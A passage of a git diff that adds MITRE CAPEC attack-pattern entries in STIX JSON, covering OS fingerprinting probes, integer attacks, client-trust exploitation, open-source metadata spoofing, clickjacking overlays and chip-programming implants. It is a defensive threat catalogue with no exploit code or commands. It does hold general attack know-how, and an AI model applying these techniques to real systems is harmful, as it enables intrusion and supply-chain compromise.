  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

    2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json new file mode 100644 index 0000000000000000000000000000000000000000..0814eee49beec2c0caf05c53962712c0acd0846c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json @@ -0,0 +1,79 @@ +{ + "id": "bundle--c68b39ea-6da1-41f7-abdb-470dc3d630bf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9.json new file mode 100644 index 0000000000000000000000000000000000000000..3216564c011c5d0447c0aac2f5fd38e9fddf1fd0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--14e35dda-bc72-4881-b334-43e5e7e1081e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-205", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/205.html" + } + ], + "id": "attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json new file mode 100644 index 0000000000000000000000000000000000000000..c9562593b767408bee93750bb3149dcc0860a195 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json @@ -0,0 +1,54 @@ +{ + "id": "bundle--d92a6a25-f540-410a-8a08-d5d48c41d28c", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json new file mode 100644 index 0000000000000000000000000000000000000000..6bb5690b900de0852fcd876da5dd659c3ae47de6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json @@ -0,0 +1,51 @@ +{ + "id": "bundle--f3cf7648-2dac-4332-bee0-f8b7e245d546", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json new file mode 100644 index 0000000000000000000000000000000000000000..03dca00e5d088c3fd21dee3b02176b673cb2e762 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json @@ -0,0 +1,105 @@ +{ + "id": "bundle--747dc324-2f22-498f-af32-d716ececdc49", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7.json new file mode 100644 index 0000000000000000000000000000000000000000..1a368fa3ab3c50d730195976c78d19f456b47b59 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7.json @@ -0,0 +1,98 @@ +{ + "id": "bundle--ae842da6-fe09-4202-8c9e-5b0da8f2a804", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.\n ", + "external_references": [ + { + "external_id": "CAPEC-691", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/691.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + } + ], + "id": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Open-Source Software Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1", + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_child_of_refs": [ + "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary provides a malicious open-source library, claiming to provide extended logging features and functionality, and spoofs the metadata with that of a widely used legitimate library. The adversary then tricks victims into including this library in their underlying application. Once the malicious software is incorporated into the application, the adversary is able to manipulate and exfiltrate log data." + ], + "x_capec_extended_description": "\n Due to open-source software's popularity, it serves as a desirable attack-vector for adversaries since a single malicious component may result in the exploitation of numerous systems/applications. Adversaries may, therefore, spoof the metadata pertaining to the open-source software in order to trick victims into downloading and using their malicious software. Examples of metadata that may be spoofed include:\n \n Owner of the software (e.g., repository or package owner)\n Author(s) of repository commits\n Frequency of repository commits\n Date/Time of repository commits\n Package or Repository \"stars\"\n \n Once the malicious software component has been integrated into an underlying application or executed on a system, the adversary is ultimately able to achieve numerous negative technical impacts within the system/application. This often occurs without any indication of compromise.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf" + ], + "x_capec_prerequisites": [ + "Identification of a popular open-source component whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of software metadata to convince victims the source is trusted." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json new file mode 100644 index 0000000000000000000000000000000000000000..8df66917efa3782774a65991a4d8c1ef2e335da3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json @@ -0,0 +1,48 @@ +{ + "id": "bundle--7c333043-32d4-42ac-adf5-9aa4c3cfc4b1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.", + "external_references": [ + { + "external_id": "CAPEC-181", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + } + ], + "id": "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Flash File Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page.", + "The victim's browser must support invisible Flash overlays." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the Flash overlay over the decoy content." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json new file mode 100644 index 0000000000000000000000000000000000000000..151d4345c10d7bca08e1af9352de4411c45a02d6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json @@ -0,0 +1,64 @@ +{ + "id": "bundle--b1d42bc9-3bcf-485e-9776-01ff863d2d9e", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json new file mode 100644 index 0000000000000000000000000000000000000000..3d293ec2f67adec4bde031440b632ab32e90ca25 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--995791b0-d4a7-4d6e-bdc1-05794c4378b6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-272", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/272.html" + } + ], + "id": "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b", + "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81", + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "The protocol or implementations thereof must contain bugs that an adversary can exploit." + ], + "x_capec_resources_required": [ + "In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json new file mode 100644 index 0000000000000000000000000000000000000000..e7cdae0933c35b3e9daceecbe00c77f73a988b28 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--c8dc799b-f843-41d4-a0c7-bb57c43dce45", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json new file mode 100644 index 0000000000000000000000000000000000000000..9317e41a845080ce0516c43e315147d1dd24a1b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json @@ -0,0 +1,73 @@ +{ + "id": "bundle--bd976170-dff2-4b6e-8a26-4733b5f23cc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.\n ", + "external_references": [ + { + "external_id": "CAPEC-191", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/191.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "description": "Unsecured Credentials:Credentials in files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-51", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Decompiler" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-52", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Debugger" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-53", + "source_name": "reference_from_CAPEC", + "url": 